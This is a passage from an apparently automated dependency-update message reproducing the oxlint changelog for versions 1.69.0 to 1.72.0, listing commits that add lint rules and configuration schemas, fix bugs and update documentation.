Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.71.0...oxlint_v1.72.0)

##### 🚀 Features

-
[`1c8f50c`](https://redirect.github.com/oxc-project/oxc/commit/1c8f50c)
linter: Add schema for `eslint/no-restricted-import`
([#&#8203;23642](https://redirect.github.com/oxc-project/oxc/issues/23642))
(Sysix)

##### 🐛 Bug Fixes

-
[`742be36`](https://redirect.github.com/oxc-project/oxc/commit/742be36)
refactor/node/handle-callback-err: Reject invalid regex config
([#&#8203;23740](https://redirect.github.com/oxc-project/oxc/issues/23740))
(camc314)

###
[`v1.71.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1710---2026-06-22)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.70.0...oxlint_v1.71.0)

##### 🚀 Features

-
[`0dc2405`](https://redirect.github.com/oxc-project/oxc/commit/0dc2405)
linter: Add schema for `eslint/no-restricted-properties`
([#&#8203;23619](https://redirect.github.com/oxc-project/oxc/issues/23619))
(Sysix)
-
[`b638d0e`](https://redirect.github.com/oxc-project/oxc/commit/b638d0e)
linter: Add schema for `node/callback-return`
([#&#8203;23615](https://redirect.github.com/oxc-project/oxc/issues/23615))
(Sysix)
-
[`eb8bedc`](https://redirect.github.com/oxc-project/oxc/commit/eb8bedc)
linter: Add schema for `import/extensions`
([#&#8203;23557](https://redirect.github.com/oxc-project/oxc/issues/23557))
(WaterWhisperer)
-
[`46f3625`](https://redirect.github.com/oxc-project/oxc/commit/46f3625)
linter: Implement node/no-sync rule
([#&#8203;23589](https://redirect.github.com/oxc-project/oxc/issues/23589))
(fujitani sora)
-
[`b01739a`](https://redirect.github.com/oxc-project/oxc/commit/b01739a)
linter: Add schema for `unicorn/numeric-separators-style`
([#&#8203;23554](https://redirect.github.com/oxc-project/oxc/issues/23554))
(Mikhail Baev)
-
[`68afd2a`](https://redirect.github.com/oxc-project/oxc/commit/68afd2a)
linter/node: Implement `no-mixed-requires` rule
([#&#8203;23539](https://redirect.github.com/oxc-project/oxc/issues/23539))
(fujitani sora)
-
[`a421215`](https://redirect.github.com/oxc-project/oxc/commit/a421215)
linter: Add schema for `eslint/prefer-destructuring`
([#&#8203;23410](https://redirect.github.com/oxc-project/oxc/issues/23410))
(WaterWhisperer)
-
[`84438be`](https://redirect.github.com/oxc-project/oxc/commit/84438be)
linter/jsdoc: Added missing options to `require-param-description`
([#&#8203;23416](https://redirect.github.com/oxc-project/oxc/issues/23416))
(kapobajza)
-
[`51910df`](https://redirect.github.com/oxc-project/oxc/commit/51910df)
linter/jsdoc: Add missing options to `require-param-type` rule
([#&#8203;23418](https://redirect.github.com/oxc-project/oxc/issues/23418))
(kapobajza)
-
[`e90925f`](https://redirect.github.com/oxc-project/oxc/commit/e90925f)
linter/unicorn: Implement prefer-number-coercion rule
([#&#8203;23497](https://redirect.github.com/oxc-project/oxc/issues/23497))
(Shekhu☺️)
-
[`dd1c866`](https://redirect.github.com/oxc-project/oxc/commit/dd1c866)
linter/vue: Implement no-async-in-computed-properties rule
([#&#8203;23493](https://redirect.github.com/oxc-project/oxc/issues/23493))
(bab)
-
[`b02444e`](https://redirect.github.com/oxc-project/oxc/commit/b02444e)
linter: Add schema for `react/jsx-no-script-url`
([#&#8203;23475](https://redirect.github.com/oxc-project/oxc/issues/23475))
(WaterWhisperer)
-
[`a8dce46`](https://redirect.github.com/oxc-project/oxc/commit/a8dce46)
linter/unicorn: Implement `max-nested-calls` rule
([#&#8203;23461](https://redirect.github.com/oxc-project/oxc/issues/23461))
(arieleli01212)

##### 🐛 Bug Fixes

-
[`a303c23`](https://redirect.github.com/oxc-project/oxc/commit/a303c23)
linter/jsx-a11y: Align `anchor-is-valid` config with upstream
([#&#8203;23446](https://redirect.github.com/oxc-project/oxc/issues/23446))
(camc314)

##### 📚 Documentation

-
[`b50bf4d`](https://redirect.github.com/oxc-project/oxc/commit/b50bf4d)
linter: Remove manually written options doc for
`eslint/arrow-body-style`
([#&#8203;23490](https://redirect.github.com/oxc-project/oxc/issues/23490))
(Mikhail Baev)

###
[`v1.70.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1700---2026-06-15)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.69.0...oxlint_v1.70.0)

##### 🚀 Features

-
[`2e8bda4`](https://redirect.github.com/oxc-project/oxc/commit/2e8bda4)
linter/vue: Implement no-dupe-keys rule
([#&#8203;23350](https://redirect.github.com/oxc-project/oxc/issues/23350))
(bab)
-
[`1490a0a`](https://redirect.github.com/oxc-project/oxc/commit/1490a0a)
linter/react: Implement react-compiler rule
([#&#8203;23202](https://redirect.github.com/oxc-project/oxc/issues/23202))
(Boshen)
-
[`dd560ae`](https://redirect.github.com/oxc-project/oxc/commit/dd560ae)
linter/unicorn: Implement `no-array-fill-with-reference-type` rule
([#&#8203;23397](https://redirect.github.com/oxc-project/oxc/issues/23397))
(Mikhail Baev)
-
[`af36c2f`](https://redirect.github.com/oxc-project/oxc/commit/af36c2f)
linter: Add schema for `react/jsx-curly-brace-presence`
([#&#8203;23400](https://redirect.github.com/oxc-project/oxc/issues/23400))
(WaterWhisperer)
-
[`47d34a3`](https://redirect.github.com/oxc-project/oxc/commit/47d34a3)
linter: Add schema for `react/jsx-handler-names`
([#&#8203;23393](https://redirect.github.com/oxc-project/oxc/issues/23393))
(WaterWhisperer)
-
[`f4250d0`](https://redirect.github.com/oxc-project/oxc/commit/f4250d0)
linter: Add schema for `unicorn/import-style`
([#&#8203;23386](https://redirect.github.com/oxc-project/oxc/issues/23386))
(WaterWhisperer)
-
[`30c74ce`](https://redirect.github.com/oxc-project/oxc/commit/30c74ce)
linter: Add schema for
`jsx_a11y/no-noninteractive-element-to-interactive-role`
([#&#8203;23384](https://redirect.github.com/oxc-project/oxc/issues/23384))
(Sysix)
-
[`cfbe8dc`](https://redirect.github.com/oxc-project/oxc/commit/cfbe8dc)
linter: Add schema for
`jsx_a11y/no-interactive-element-to-noninteractive-role`
([#&#8203;23382](https://redirect.github.com/oxc-project/oxc/issues/23382))
(WaterWhisperer)
-
[`d15b7ff`](https://redirect.github.com/oxc-project/oxc/commit/d15b7ff)
linter: Add schema for `typescript/no-restricted-types`
([#&#8203;23381](https://redirect.github.com/oxc-project/oxc/issues/23381))
(WaterWhisperer)
-
[`028a811`](https://redirect.github.com/oxc-project/oxc/commit/028a811)
linter: Add schema for `jsx-a11y/media-has-caption`
([#&#8203;23377](https://redirect.github.com/oxc-project/oxc/issues/23377))
(Sysix)
-
[`b3b1038`](https://redirect.github.com/oxc-project/oxc/commit/b3b1038)
linter: Add schema for `jsx-a11y/label-has-associated-control`
([#&#8203;23376](https://redirect.github.com/oxc-project/oxc/issues/23376))
(Sysix)
-
[`7ada6b2`](https://redirect.github.com/oxc-project/oxc/commit/7ada6b2)
linter: Add schema for `jsx_a11y/no-distracting-elements`
([#&#8203;23379](https://redirect.github.com/oxc-project/oxc/issues/23379))
(WaterWhisperer)
-
[`ee3dd49`](https://redirect.github.com/oxc-project/oxc/commit/ee3dd49)
linter: Add schema for `jsx-a11y/img-redundant-alt`
([#&#8203;23374](https://redirect.github.com/oxc-project/oxc/issues/23374))
(Sysix)
-
[`df5f8dd`](https://redirect.github.com/oxc-project/oxc/commit/df5f8dd)
linter: Add short descriptions to most lint rules.
([#&#8203;23365](https://redirect.github.com/oxc-project/oxc/issues/23365))
(Connor Shea)
-
[`e3fd735`](https://redirect.github.com/oxc-project/oxc/commit/e3fd735)
linter: Add schema for `jsx_a11y/alt-text`
([#&#8203;23369](https://redirect.github.com/oxc-project/oxc/issues/23369))
(Sysix)
-
[`0f2fff4`](https://redirect.github.com/oxc-project/oxc/commit/0f2fff4)
linter: Add schema for `react/exhaustive-deps`
([#&#8203;23372](https://redirect.github.com/oxc-project/oxc/issues/23372))
(Mikhail Baev)
-
[`e3e4e10`](https://redirect.github.com/oxc-project/oxc/commit/e3e4e10)
linter: Add schema for `react_perf/jsx-no-new-object-as-prop`
([#&#8203;23368](https://redirect.github.com/oxc-project/oxc/issues/23368))
(Mikhail Baev)
-
[`9366d44`](https://redirect.github.com/oxc-project/oxc/commit/9366d44)
linter: Add schema for `unicorn/prefer-at`
([#&#8203;23366](https://redirect.github.com/oxc-project/oxc/issues/23366))
(WaterWhisperer)
-
[`f57b55d`](https://redirect.github.com/oxc-project/oxc/commit/f57b55d)
linter: Add schema for `typescript/array-type`
([#&#8203;23355](https://redirect.github.com/oxc-project/oxc/issues/23355))
(Sysix)
-
[`0dcf912`](https://redirect.github.com/oxc-project/oxc/commit/0dcf912)
linter: Add schema for `typescript/ban-ts-comment`
([#&#8203;23354](https://redirect.github.com/oxc-project/oxc/issues/23354))
(Sysix)
-
[`51fa83e`](https://redirect.github.com/oxc-project/oxc/commit/51fa83e)
linter: Add schema for `react/no-did-update-set-state`
([#&#8203;23357](https://redirect.github.com/oxc-project/oxc/issues/23357))
(Mikhail Baev)
-
[`59db0bd`](https://redirect.github.com/oxc-project/oxc/commit/59db0bd)
linter: Add schema for `consistent-generic-constructors`
([#&#8203;23353](https://redirect.github.com/oxc-project/oxc/issues/23353))
(Sysix)
-
[`c4775c0`](https://redirect.github.com/oxc-project/oxc/commit/c4775c0)
linter: Add schema for `typescript/consistent-type-assertions`
([#&#8203;23349](https://redirect.github.com/oxc-project/oxc/issues/23349))
(Sysix)
-
[`6e516f7`](https://redirect.github.com/oxc-project/oxc/commit/6e516f7)
linter: Add schema for `typescript/consistent-type-imports`
([#&#8203;23348](https://redirect.github.com/oxc-project/oxc/issues/23348))
(Sysix)
-
[`012134d`](https://redirect.github.com/oxc-project/oxc/commit/012134d)
linter: Add schema for `react/jsx-no-target-blank`
([#&#8203;23345](https://redirect.github.com/oxc-project/oxc/issues/23345))
(WaterWhisperer)
-
[`0806aae`](https://redirect.github.com/oxc-project/oxc/commit/0806aae)
linter: Add schema for `jsx_a11y/no-noninteractive-tabindex`
([#&#8203;23337](https://redirect.github.com/oxc-project/oxc/issues/23337))
(Mikhail Baev)
-
[`0708b5a`](https://redirect.github.com/oxc-project/oxc/commit/0708b5a)
linter: Add schema for `react/jsx-filename-extension`
([#&#8203;23315](https://redirect.github.com/oxc-project/oxc/issues/23315))
(Mikhail Baev)
-
[`150bce1`](https://redirect.github.com/oxc-project/oxc/commit/150bce1)
linter: Add schema for `typescript/no-empty-object-type`
([#&#8203;23309](https://redirect.github.com/oxc-project/oxc/issues/23309))
(Sysix)
-
[`f9e36f1`](https://redirect.github.com/oxc-project/oxc/commit/f9e36f1)
linter: Add schema for `typescript/no-duplicate-type-constituents`
([#&#8203;23308](https://redirect.github.com/oxc-project/oxc/issues/23308))
(Sysix)
-
[`937accf`](https://redirect.github.com/oxc-project/oxc/commit/937accf)
linter: Add schema for `typescript/no-invalid-void-type`
([#&#8203;23307](https://redirect.github.com/oxc-project/oxc/issues/23307))
(Sysix)
-
[`3e042b9`](https://redirect.github.com/oxc-project/oxc/commit/3e042b9)
linter: Add schema for `typescript/no-misused-promises`
([#&#8203;23306](https://redirect.github.com/oxc-project/oxc/issues/23306))
(Sysix)
-
[`da212d1`](https://redirect.github.com/oxc-project/oxc/commit/da212d1)
linter: Add schema for `typescript/no-unnecessary-condition`
([#&#8203;23305](https://redirect.github.com/oxc-project/oxc/issues/23305))
(Sysix)
-
[`f8f0d38`](https://redirect.github.com/oxc-project/oxc/commit/f8f0d38)
linter: Add schema for `typescript/parameter-properties`
([#&#8203;23304](https://redirect.github.com/oxc-project/oxc/issues/23304))
(Sysix)
-
[`2275fc7`](https://redirect.github.com/oxc-project/oxc/commit/2275fc7)
linter: Add schema for `typescript/prefer-nullish-coalescing`
([#&#8203;23302](https://redirect.github.com/oxc-project/oxc/issues/23302))
(Sysix)
-
[`d353858`](https://redirect.github.com/oxc-project/oxc/commit/d353858)
linter: Add schema for `typescript/prefer-string-starts-ends-with`
([#&#8203;23301](https://redirect.github.com/oxc-project/oxc/issues/23301))
(Sysix)
-
[`03060f5`](https://redirect.github.com/oxc-project/oxc/commit/03060f5)
linter: Add schema for `typescript/triple-slash-reference`
([#&#8203;23300](https://redirect.github.com/oxc-project/oxc/issues/23300))
(Sysix)
-
[`6619cee`](https://redirect.github.com/oxc-project/oxc/commit/6619cee)
linter: Add schema for `promise/param-names`
([#&#8203;23298](https://redirect.github.com/oxc-project/oxc/issues/23298))
(Sysix)
-
[`8bf108e`](https://redirect.github.com/oxc-project/oxc/commit/8bf108e)
linter: Add schema for `promise/catch-or-return`
([#&#8203;23297](https://redirect.github.com/oxc-project/oxc/issues/23297))
(Sysix)
-
[`48158d0`](https://redirect.github.com/oxc-project/oxc/commit/48158d0)
linter: Add schema for `vitest/consistent-each-for`
([#&#8203;23294](https://redirect.github.com/oxc-project/oxc/issues/23294))
(Sysix)
-
[`7e74c98`](https://redirect.github.com/oxc-project/oxc/commit/7e74c98)
linter: Add schema for `vitest/consistent-test-filename`
([#&#8203;23293](https://redirect.github.com/oxc-project/oxc/issues/23293))
(Sysix)
-
[`ff94d4a`](https://redirect.github.com/oxc-project/oxc/commit/ff94d4a)
linter: Add schema for `vitest/consistent-vitest-vi`
([#&#8203;23292](https://redirect.github.com/oxc-project/oxc/issues/23292))
(Sysix)
-
[`2409a10`](https://redirect.github.com/oxc-project/oxc/commit/2409a10)
linter: Add schema for `vitest/prefer-import-in-mock`
([#&#8203;23291](https://redirect.github.com/oxc-project/oxc/issues/23291))
(Sysix)
-
[`3d782b7`](https://redirect.github.com/oxc-project/oxc/commit/3d782b7)
linter: Add schema for `react/no-unstable-nested-components`
([#&#8203;23287](https://redirect.github.com/oxc-project/oxc/issues/23287))
(Mikhail Baev)
-
[`0a0bc2f`](https://redirect.github.com/oxc-project/oxc/commit/0a0bc2f)
linter/jsx-a11y: Add `allowedRedundantRoles` option to
`no-redundant-roles`
([#&#8203;22820](https://redirect.github.com/oxc-project/oxc/issues/22820))
(bab)
-
[`80758a5`](https://redirect.github.com/oxc-project/oxc/commit/80758a5)
linter/vue: Implement no-side-effects-in-computed-properties rule
([#&#8203;23282](https://redirect.github.com/oxc-project/oxc/issues/23282))
(bab)
-
[`e3869ac`](https://redirect.github.com/oxc-project/oxc/commit/e3869ac)
linter: Add schema for `react/no-object-type-as-default-prop`
([#&#8203;23279](https://redirect.github.com/oxc-project/oxc/issues/23279))
(Mikhail Baev)
-
[`4480609`](https://redirect.github.com/oxc-project/oxc/commit/4480609)
linter: Add schema for `react/jsx-props-no-spreading`
([#&#8203;23276](https://redirect.github.com/oxc-project/oxc/issues/23276))
(Mikhail Baev)
-
[`08d68a5`](https://redirect.github.com/oxc-project/oxc/commit/08d68a5)
linter/react: Implement `jsx-no-literals` rule
([#&#8203;23145](https://redirect.github.com/oxc-project/oxc/issues/23145))
(kapobajza)
-
[`9a2788b`](https://redirect.github.com/oxc-project/oxc/commit/9a2788b)
linter/unicorn: Implement `prefer-export-from` rule
([#&#8203;22935](https://redirect.github.com/oxc-project/oxc/issues/22935))
(AliceLanniste)
-
[`bdb723c`](https://redirect.github.com/oxc-project/oxc/commit/bdb723c)
linter/unicorn: Implement prefer-single-call rule
([#&#8203;23235](https://redirect.github.com/oxc-project/oxc/issues/23235))
(Yuzhe Shi)
-
[`31543ed`](https://redirect.github.com/oxc-project/oxc/commit/31543ed)
linter: Add schema for `vue/define-props-destructuring`
([#&#8203;23252](https://redirect.github.com/oxc-project/oxc/issues/23252))
(Sysix)
-
[`21b6c3d`](https://redirect.github.com/oxc-project/oxc/commit/21b6c3d)
linter: Add schema for `oxc/no-async-endpoint-handlers`
([#&#8203;23251](https://redirect.github.com/oxc-project/oxc/issues/23251))
(Sysix)
-
[`e77ff81`](https://redirect.github.com/oxc-project/oxc/commit/e77ff81)
linter: Add schema for `unicorn/prefer-object-from-entries`
([#&#8203;23249](https://redirect.github.com/oxc-project/oxc/issues/23249))
(Mikhail Baev)
-
[`bcac2d6`](https://redirect.github.com/oxc-project/oxc/commit/bcac2d6)
linter: Add schema for `jest/vitest/no-restricted-matchers`
([#&#8203;23247](https://redirect.github.com/oxc-project/oxc/issues/23247))
(Sysix)
-
[`539f036`](https://redirect.github.com/oxc-project/oxc/commit/539f036)
linter: Add schema for `jest/vitest/no-restricted-*-methods`
([#&#8203;23246](https://redirect.github.com/oxc-project/oxc/issues/23246))
(Sysix)
-
[`dd1b927`](https://redirect.github.com/oxc-project/oxc/commit/dd1b927)
linter/vue: Implement require-default-prop rule
([#&#8203;22951](https://redirect.github.com/oxc-project/oxc/issues/22951))
(bab)
-
[`3f018e7`](https://redirect.github.com/oxc-project/oxc/commit/3f018e7)
linter: Add schema for `unicorn/no-instanceof-builtins`
([#&#8203;23225](https://redirect.github.com/oxc-project/oxc/issues/23225))
(Mikhail Baev)
-
[`e0d0f78`](https://redirect.github.com/oxc-project/oxc/commit/e0d0f78)
linter: Verify promise/no-callback-in-promise schema
([#&#8203;23141](https://redirect.github.com/oxc-project/oxc/issues/23141))
(beanscg)
-
[`123d4f4`](https://redirect.github.com/oxc-project/oxc/commit/123d4f4)
linter: Add schema for `jest/vitest/valid-expect`
([#&#8203;23185](https://redirect.github.com/oxc-project/oxc/issues/23185))
(Sysix)
-
[`46c8a21`](https://redirect.github.com/oxc-project/oxc/commit/46c8a21)
linter: Add schema for `jest/vitest/require-top-level-describe`
([#&#8203;23184](https://redirect.github.com/oxc-project/oxc/issues/23184))
(Sysix)
-
[`41465cf`](https://redirect.github.com/oxc-project/oxc/commit/41465cf)
linter: Add schema for `jest/vitest/prefer-snapshot-hint`
([#&#8203;23183](https://redirect.github.com/oxc-project/oxc/issues/23183))
(Sysix)
-
[`d068b9b`](https://redirect.github.com/oxc-project/oxc/commit/d068b9b)
linter: Add schema for `jest/vitest/prefer-expect-assertions`
([#&#8203;23181](https://redirect.github.com/oxc-project/oxc/issues/23181))
(Sysix)
-
[`064a1ee`](https://redirect.github.com/oxc-project/oxc/commit/064a1ee)
linter: Add schema for `jest/prefer-ending-with-an-expect`
([#&#8203;23180](https://redirect.github.com/oxc-project/oxc/issues/23180))
(Sysix)
-
[`d046797`](https://redirect.github.com/oxc-project/oxc/commit/d046797)
linter: Add schema for `jest/vitest/no-standalone-expect`
([#&#8203;23179](https://redirect.github.com/oxc-project/oxc/issues/23179))
(Sysix)
-
[`137b9a6`](https://redirect.github.com/oxc-project/oxc/commit/137b9a6)
linter: Add schema for `jest/vitest/no-large-snapshots`
([#&#8203;23178](https://redirect.github.com/oxc-project/oxc/issues/23178))
(Sysix)
-
[`0f3e4a5`](https://redirect.github.com/oxc-project/oxc/commit/0f3e4a5)
linter: Add schema for `jest/vitest/no-hooks`
([#&#8203;23177](https://redirect.github.com/oxc-project/oxc/issues/23177))
(Sysix)
-
[`cd0b384`](https://redirect.github.com/oxc-project/oxc/commit/cd0b384)
linter: Add schema for `unicorn/explicit-length-check`
([#&#8203;23155](https://redirect.github.com/oxc-project/oxc/issues/23155))
(Mikhail Baev)
-
[`01b74c4`](https://redirect.github.com/oxc-project/oxc/commit/01b74c4)
linter: Add schema for `jest/no-deprecated-functions`
([#&#8203;23136](https://redirect.github.com/oxc-project/oxc/issues/23136))
(Sysix)
-
[`9d6a387`](https://redirect.github.com/oxc-project/oxc/commit/9d6a387)
linter: Add schema for `unicorn/catch-error-name`
([#&#8203;23137](https://redirect.github.com/oxc-project/oxc/issues/23137))
(Mikhail Baev)
-
[`0da8efa`](https://redirect.github.com/oxc-project/oxc/commit/0da8efa)
linter: Add schema for `jest/vitest/max-nested-describe`
([#&#8203;23131](https://redirect.github.com/oxc-project/oxc/issues/23131))
(Sysix)
-
[`d71c9fd`](https://redirect.github.com/oxc-project/oxc/commit/d71c9fd)
linter: Add schema for `eslint/no-use-before-define`
([#&#8203;23129](https://redirect.github.com/oxc-project/oxc/issues/23129))
(Sysix)

##### 🐛 Bug Fixes

-
[`26ddac6`](https://redirect.github.com/oxc-project/oxc/commit/26ddac6)
linter: Avoid config schema generation for
`jsx_a11y/no-noninteractive-element-interactions`
([#&#8203;23385](https://redirect.github.com/oxc-project/oxc/issues/23385))
(Sysix)
-
[`40556ad`](https://redirect.github.com/oxc-project/oxc/commit/40556ad)
linter: Parse `jsx-a11y/control-has-associated-label` config with
`DefaultRuleConfig`
([#&#8203;23373](https://redirect.github.com/oxc-project/oxc/issues/23373))
(Sysix)
-
[`71e9648`](https://redirect.github.com/oxc-project/oxc/commit/71e9648)
linter: Expose no-noninteractive-element-interactions schema
([#&#8203;23283](https://redirect.github.com/oxc-project/oxc/issues/23283))
(camc314)
-
[`6c86d1c`](https://redirect.github.com/oxc-project/oxc/commit/6c86d1c)
linter/react-perf: Correct nativeAllowList all schema
([#&#8203;23229](https://redirect.github.com/oxc-project/oxc/issues/23229))
(camc314)
-
[`4dd52de`](https://redirect.github.com/oxc-project/oxc/commit/4dd52de)
linter/react-perf: Re-generate stale snapshots
([#&#8203;23228](https://redirect.github.com/oxc-project/oxc/issues/23228))
(camc314)
-
[`8f3db61`](https://redirect.github.com/oxc-project/oxc/commit/8f3db61)
linter: Allow options for `eslint/capitalized-comments`
([#&#8203;23139](https://redirect.github.com/oxc-project/oxc/issues/23139))
(Sysix)

#####  Performance

-
[`f09707e`](https://redirect.github.com/oxc-project/oxc/commit/f09707e)
linter: `jest/no-deprecated-functions` store config version as `usize`
([#&#8203;23138](https://redirect.github.com/oxc-project/oxc/issues/23138))
(Sysix)

##### 📚 Documentation

-
[`f682e25`](https://redirect.github.com/oxc-project/oxc/commit/f682e25)
linter: Remove manually written options doc for
`eslint/prefer-arrow-callback`
([#&#8203;23438](https://redirect.github.com/oxc-project/oxc/issues/23438))
(Mikhail Baev)
-
[`64c942c`](https://redirect.github.com/oxc-project/oxc/commit/64c942c)
linter: Remove manually written options doc for `eslint/no-sequences`
([#&#8203;23420](https://redirect.github.com/oxc-project/oxc/issues/23420))
(Mikhail Baev)
-
[`14abf32`](https://redirect.github.com/oxc-project/oxc/commit/14abf32)
linter/react-perf: Use autogenerated docs
([#&#8203;23227](https://redirect.github.com/oxc-project/oxc/issues/23227))
(camc314)

###
[`v1.69.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1690---2026-06-08)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.68.0...oxlint_v1.69.0)

##### 🚀 Features

-
[`e805174`](https://redirect.github.com/oxc-project/oxc/commit/e805174)
linter: Add schema for `jest/vitest/max-expects`
([#&#8203;23105](https://redirect.github.com/oxc-project/oxc/issues/23105))
(Sysix)
-
[`7850577`](https://redirect.github.com/oxc-project/oxc/commit/7850577)
linter: Add schema for `jest/vitest/expect-expect`
([#&#8203;23104](https://redirect.github.com/oxc-project/oxc/issues/23104))
(Sysix)
-
[`75f641a`](https://redirect.github.com/oxc-project/oxc/commit/75f641a)
linter: Add schema for `jest/vitest/consistent-test-it`
([#&#8203;23103](https://redirect.github.com/oxc-project/oxc/issues/23103))
(Sysix)
-
[`5125f89`](https://redirect.github.com/oxc-project/oxc/commit/5125f89)
linter/unicorn: Support no-null `checkArguments` option
([#&#8203;23098](https://redirect.github.com/oxc-project/oxc/issues/23098))
(camc314)
-
[`b8b9797`](https://redirect.github.com/oxc-project/oxc/commit/b8b9797)
linter: Add schema for `import-max-dependencies`
([#&#8203;23096](https://redirect.github.com/oxc-project/oxc/issues/23096))
(Sysix)
-
[`65cb47a`](https://redirect.github.com/oxc-project/oxc/commit/65cb47a)
linter/eslint: Support no-unused-expressions `ignoreDirectives` option
([#&#8203;23097](https://redirect.github.com/oxc-project/oxc/issues/23097))
(camc314)
-
[`f6c36d5`](https://redirect.github.com/oxc-project/oxc/commit/f6c36d5)
linter: Add schema for `import/prefer-default-export`
([#&#8203;23091](https://redirect.github.com/oxc-project/oxc/issues/23091))
(Sysix)
-
[`0d4a5d1`](https://redirect.github.com/oxc-project/oxc/commit/0d4a5d1)
linter: Add schema for `eslint/sort-vars`
([#&#8203;23090](https://redirect.github.com/oxc-project/oxc/issues/23090))
(Sysix)
-
[`fdb5bf5`](https://redirect.github.com/oxc-project/oxc/commit/fdb5bf5)
linter: Add schema for `eslint/radix`
([#&#8203;23082](https://redirect.github.com/oxc-project/oxc/issues/23082))
(Sysix)
-
[`05b4dcf`](https://redirect.github.com/oxc-project/oxc/commit/05b4dcf)
linter: Add schema for `eslint/prefer-const`
([#&#8203;23081](https://redirect.github.com/oxc-project/oxc/issues/23081))
(Sysix)
-
[`5a06c4d`](https://redirect.github.com/oxc-project/oxc/commit/5a06c4d)
linter/vue: Implement next-tick-style rule
([#&#8203;23041](https://redirect.github.com/oxc-project/oxc/issues/23041))
(Alex Peshkov)
-
[`e38a36a`](https://redirect.github.com/oxc-project/oxc/commit/e38a36a)
linter: Add schema for `eslint/operator-assignment`
([#&#8203;23080](https://redirect.github.com/oxc-project/oxc/issues/23080))
(Sysix)
-
[`907cee7`](https://redirect.github.com/oxc-project/oxc/commit/907cee7)
linter: Add schema for `eslint/no-warning-comments`
([#&#8203;23075](https://redirect.github.com/oxc-project/oxc/issues/23075))
(Sysix)
-
[`9470bb2`](https://redirect.github.com/oxc-project/oxc/commit/9470bb2)
linter: Add schema for `eslint/no-unused-vars`
([#&#8203;23073](https://redirect.github.com/oxc-project/oxc/issues/23073))
(Sysix)
-
[`234b5cf`](https://redirect.github.com/oxc-project/oxc/commit/234b5cf)
linter: Add schema for `eslint/no-shadow`
([#&#8203;23072](https://redirect.github.com/oxc-project/oxc/issues/23072))
(Sysix)
-
[`de0dd8b`](https://redirect.github.com/oxc-project/oxc/commit/de0dd8b)
linter: Add schema for `eslint/no-restricted-exports`
([#&#8203;23020](https://redirect.github.com/oxc-project/oxc/issues/23020))
(Sysix)
-
[`faa3e0d`](https://redirect.github.com/oxc-project/oxc/commit/faa3e0d)
linter: Add schema for `eslint/no-param-reassign`
([#&#8203;23018](https://redirect.github.com/oxc-project/oxc/issues/23018))
(Sysix)
-
[`dbc9c27`](https://redirect.github.com/oxc-project/oxc/commit/dbc9c27)
linter: Add schema for `eslint/no-magic-numbers`
([#&#8203;23017](https://redirect.github.com/oxc-project/oxc/issues/23017))
(Sysix)
-
[`38d3569`](https://redirect.github.com/oxc-project/oxc/commit/38d3569)
linter: Add schema for `eslint/no-inner-declarations`
([#&#8203;23016](https://redirect.github.com/oxc-project/oxc/issues/23016))
(Sysix)
-
[`008fa41`](https://redirect.github.com/oxc-project/oxc/commit/008fa41)
linter: Add schema for `eslint/no-constant-condition`
([#&#8203;22991](https://redirect.github.com/oxc-project/oxc/issues/22991))
(Sysix)
-
[`ca44623`](https://redirect.github.com/oxc-project/oxc/commit/ca44623)
linter: Add schema for `eslint/no-empty-function`
([#&#8203;22988](https://redirect.github.com/oxc-project/oxc/issues/22988))
(Sysix)
-
[`43eb04d`](https://redirect.github.com/oxc-project/oxc/commit/43eb04d)
linter: Add schema for `eslint/id-match`
([#&#8203;22987](https://redirect.github.com/oxc-project/oxc/issues/22987))
(Sysix)
-
[`a800f27`](https://redirect.github.com/oxc-project/oxc/commit/a800f27)
linter: Add schema for `eslint/capitalized-comments`
([#&#8203;22984](https://redirect.github.com/oxc-project/oxc/issues/22984))
(Sysix)
-
[`96e2d32`](https://redirect.github.com/oxc-project/oxc/commit/96e2d32)
linter: Add schema for `eslint/id-length`
([#&#8203;22963](https://redirect.github.com/oxc-project/oxc/issues/22963))
(Sysix)
-
[`545493f`](https://redirect.github.com/oxc-project/oxc/commit/545493f)
linter: Add schema for `eslint/complexity`
([#&#8203;22960](https://redirect.github.com/oxc-project/oxc/issues/22960))
(Sysix)
-
[`5f0b558`](https://redirect.github.com/oxc-project/oxc/commit/5f0b558)
linter: Add schema for `eslint/class-methods-use-this`
([#&#8203;22959](https://redirect.github.com/oxc-project/oxc/issues/22959))
(Sysix)
-
[`719b720`](https://redirect.github.com/oxc-project/oxc/commit/719b720)
linter: Add schema for simple rule configurations
([#&#8203;22948](https://redirect.github.com/oxc-project/oxc/issues/22948))
(Sysix)
-
[`fd00966`](https://redirect.github.com/oxc-project/oxc/commit/fd00966)
linter: Add right schema for `eslint/max-*` rules
([#&#8203;22923](https://redirect.github.com/oxc-project/oxc/issues/22923))
(Sysix)
-
[`1226d78`](https://redirect.github.com/oxc-project/oxc/commit/1226d78)
linter: Fill schema with rule configurations
([#&#8203;22907](https://redirect.github.com/oxc-project/oxc/issues/22907))
(Sysix)
-
[`8f423c1`](https://redirect.github.com/oxc-project/oxc/commit/8f423c1)
linter/vue: Implement `require-direct-export` rule
([#&#8203;17623](https://redirect.github.com/oxc-project/oxc/issues/17623))
(yefan)
-
[`78e915b`](https://redirect.github.com/oxc-project/oxc/commit/78e915b)
linter/vue: Implement no-reserved-props rule
([#&#8203;22914](https://redirect.github.com/oxc-project/oxc/issues/22914))
(bab)
-
[`0f200a9`](https://redirect.github.com/oxc-project/oxc/commit/0f200a9)
linter/vue: Implement require-prop-types rule
([#&#8203;22083](https://redirect.github.com/oxc-project/oxc/issues/22083))
(Alex Peshkov)
-
[`5da9da9`](https://redirect.github.com/oxc-project/oxc/commit/5da9da9)
linter/vue: Implement no-reserved-keys rule
([#&#8203;21780](https://redirect.github.com/oxc-project/oxc/issues/21780))
(bab)
-
[`75e14a8`](https://redirect.github.com/oxc-project/oxc/commit/75e14a8)
linter/vue: Implement prop-name-casing rule
([#&#8203;22892](https://redirect.github.com/oxc-project/oxc/issues/22892))
(bab)

##### 🐛 Bug Fixes

-
[`0383e61`](https://redirect.github.com/oxc-project/oxc/commit/0383e61)
linter: Fix schema for rules without a config
([#&#8203;22946](https://redirect.github.com/oxc-project/oxc/issues/22946))
